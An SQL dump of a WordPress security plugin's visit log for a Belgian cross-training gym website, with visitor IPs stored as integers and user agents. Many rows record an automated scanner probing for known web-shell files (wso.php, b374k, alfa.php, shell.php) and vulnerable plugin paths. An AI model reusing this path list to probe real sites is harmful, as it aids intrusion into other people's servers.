(70157, 1492707892.178824, 1538594463, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70158, 1492708082.764407, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70159, 1492709883.469761, 1538655959, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9515 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(70160, 1492710755.102871, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70161, 1492715686.624826, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70162, 1492715944.455652, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'http://crosstrainingcenter.be/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70163, 1492717736.043832, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70164, 1492719367.072537, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70165, 1492719371.095461, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70166, 1492720433.897859, 1550331697, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70167, 1492720455.564470, 1550331697, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70168, 1492720465.620782, 1550331697, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70169, 1492721197.331953, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70170, 1492721197.813074, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70171, 1492721198.230576, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70172, 1492721198.701131, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70173, 1492721199.241773, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70174, 1492721199.657215, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70175, 1492721200.412933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70176, 1492721200.870825, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70177, 1492721201.295711, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70178, 1492721201.698814, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70179, 1492721202.108589, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70180, 1492721202.581228, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70181, 1492721203.011784, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70182, 1492721203.449569, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70183, 1492724317.949275, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70184, 1492724560.907113, 96767447, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/dropbox-backup/img/icon.png', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),
(70185, 1492728543.687013, 676177827, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70186, 1492728573.850623, 2637637505, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70187, 1492728908.914970, 2960257761, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/img.php', '', ''),
(70188, 1492732565.450213, 3024883597, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70189, 1492734294.675808, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/img.php', '', ''),
(70190, 1492735762.927544, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/readme.php', '', ''),
(70191, 1492736033.394672, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/config.php', '', ''),
(70192, 1492738213.314219, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp.php', '', ''),
(70193, 1492738440.316468, 3475901887, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70194, 1492738933.824139, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/403.php', '', ''),
(70195, 1492739469.945547, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-logs.php', '', ''),
(70196, 1492739819.859178, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70197, 1492739820.390648, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70198, 1492740124.033032, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/security.php', '', ''),
(70199, 1492740132.328448, 3475901862, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70200, 1492741411.401182, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/style.php', '', ''),
(70201, 1492741543.542797, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-error.php', '', ''),
(70202, 1492741650.517075, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-info.php', '', ''),
(70203, 1492742326.098032, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/akismet/wah.php', '', ''),
(70204, 1492742557.557017, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cache.php', '', ''),
(70205, 1492742757.676790, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/mssqli.php', '', ''),
(70206, 1492742773.718880, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/404.php', '', ''),
(70207, 1492743904.631013, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/xml.php', '', ''),
(70208, 1492745221.745715, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/b374k-2.8.php', '', ''),
(70209, 1492746648.004688, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70210, 1492746648.549361, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70211, 1492747188.746126, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-more.php', '', ''),
(70212, 1492747371.344437, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/ms-post.php', '', ''),
(70213, 1492748395.308093, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/info.php', '', ''),
(70214, 1492748482.229439, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfourteen/404.php', '', ''),
(70215, 1492749452.477435, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/vent-fitness/help.php', '', ''),
(70216, 1492749755.978472, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-searches.php', '', ''),
(70217, 1492750214.891070, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-security.php', '', ''),
(70218, 1492751032.891094, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/support.php', '', ''),
(70219, 1492751333.003580, 3475901864, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70220, 1492751403.914697, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-updates.php', '', ''),
(70221, 1492752883.056551, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/load-config.php', '', ''),
(70222, 1492754854.810061, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70223, 1492754855.490651, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70224, 1492754855.942924, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70225, 1492754856.413646, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70226, 1492754856.864477, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70227, 1492754857.319680, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70228, 1492754857.823859, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70229, 1492754858.255111, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70230, 1492754858.698710, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70231, 1492754859.211802, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70232, 1492754859.639139, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70233, 1492755607.178691, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/phpini.php', '', ''),
(70234, 1492756019.712452, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/xml1-wp2.php', '', ''),
(70235, 1492756652.635809, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-conf.php', '', ''),
(70236, 1492756948.725244, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/404.php', '', ''),
(70237, 1492758148.191829, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/security.php', '', ''),
(70238, 1492758210.685638, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/gallery.php', '', ''),
(70239, 1492759145.713877, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/alfa.php', '', ''),
(70240, 1492759503.939819, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/mainik.php', '', ''),
(70241, 1492760512.525035, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/config.php', '', ''),
(70242, 1492761115.938635, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/license.php', '', ''),
(70243, 1492763580.670147, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70244, 1492763584.273459, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70245, 1492763643.828281, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70246, 1492763904.892236, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/sh.php', '', ''),
(70247, 1492764006.809322, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.php', '', ''),
(70248, 1492764994.535289, 1838119706, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70249, 1492764997.697118, 1838119706, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70250, 1492765000.093137, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70251, 1492765001.150851, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70252, 1492765002.057436, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70253, 1492765004.543158, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70254, 1492765006.995058, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70255, 1492765007.681850, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70256, 1492765008.489272, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70257, 1492765009.325373, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70258, 1492765010.012884, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70259, 1492766289.203967, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&sqi=2&ved=0ahUKEwjZ3_Hgm7XTAhWmF8AKHQofDFIQFggwMAI&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70260, 1492766738.581653, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/system.php', '', ''),
(70261, 1492767519.112642, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfifteen/functions.php', '', ''),
(70262, 1492768133.683820, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/tmp.php', '', ''),
(70263, 1492768623.414086, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cachefix.php', '', ''),
(70264, 1492768696.760624, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/colors/ocean/ocean.php', '', ''),
(70265, 1492768737.342301, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/temp.php', '', ''),
(70266, 1492769116.441012, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/info.php', '', ''),
(70267, 1492769476.833448, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/plagmain.php', '', ''),
(70268, 1492770251.850982, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/backup.php', '', ''),
(70269, 1492771609.733153, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/lndex.php', '', ''),
(70270, 1492771620.104434, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/systemserver.php', '', ''),
(70271, 1492772535.847296, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/logs.php', '', ''),
(70272, 1492773413.826050, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/error.php', '', ''),
(70273, 1492773431.969478, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sites.php', '', ''),
(70274, 1492773679.192739, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wso.php', '', ''),
(70275, 1492774383.728289, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/opts.php', '', ''),
(70276, 1492774471.953907, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes.php', '', ''),
(70277, 1492775105.870996, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-index.php', '', ''),
(70278, 1492775749.943252, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logs.php', '', ''),
(70279, 1492778337.998425, 3164826652, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=%7Bnum:1%7D', 'http://www.crosstrainingcenter.be/?author=%7Bnum:1%7D', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(70280, 1492779670.248663, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', ''),
(70281, 1492779835.625718, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/pomo/was-wp.php', '', ''),
(70282, 1492780439.771276, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/update-wp.php', '', ''),
(70283, 1492781284.130331, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cacheplugin.php', '', ''),
(70284, 1492781974.081140, 872366397, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70285, 1492782012.049565, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70286, 1492782099.041082, 787193540, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; Ypkch32; rv:11.0) like Gecko'),
(70287, 1492782099.690809, 3570102226, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwiWxJum1rXTAhXB6xoKHVwHBzIQFghbMAk&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; Ypkch32; rv:11.0) like Gecko');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70288, 1492782102.373439, 3570102226, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; Ypkch32; rv:11.0) like Gecko'),
(70289, 1492782505.734080, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/wp-load.php', '', ''),
(70290, 1492783308.891067, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/plugin.php', '', ''),
(70291, 1492783342.265742, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cache.php', '', ''),
(70292, 1492783810.150408, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/wp-xmpp.php', '', ''),
(70293, 1492784316.646335, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/maink.php', '', ''),
(70294, 1492784375.905937, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/help.php', '', ''),
(70295, 1492784784.697161, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sh.php', '', ''),
(70296, 1492786290.025298, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentytwelve/help.php', '', ''),
(70297, 1492786646.226254, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/Iicense.php?wso', '', ''),
(70298, 1492787686.605827, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.php', '', ''),
(70299, 1492788417.529468, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-config-sample.php', '', ''),
(70300, 1492788759.926261, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-credits.php', '', ''),
(70301, 1492789176.610042, 3475901863, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70302, 1492790042.399917, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web.php', '', ''),
(70303, 1492790239.497280, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-engines.php', '', ''),
(70304, 1492791407.752377, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/setup.php', '', ''),
(70305, 1492792838.141465, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shell.php', '', ''),
(70306, 1492792998.076480, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/security-e.php', '', ''),
(70307, 1492794619.655727, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-error.php', '', ''),
(70308, 1492795488.428125, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/error_log.php', '', ''),
(70309, 1492795840.245081, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/file.php', '', ''),
(70310, 1492797113.322818, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php', '', ''),
(70311, 1492799363.478940, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/js.php', '', ''),
(70312, 1492799713.162818, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/syslib.php', '', ''),
(70313, 1492800588.339598, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/security.php', '', ''),
(70314, 1492801316.202321, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-systems.php', '', ''),
(70315, 1492801348.297486, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-conf.php', '', ''),
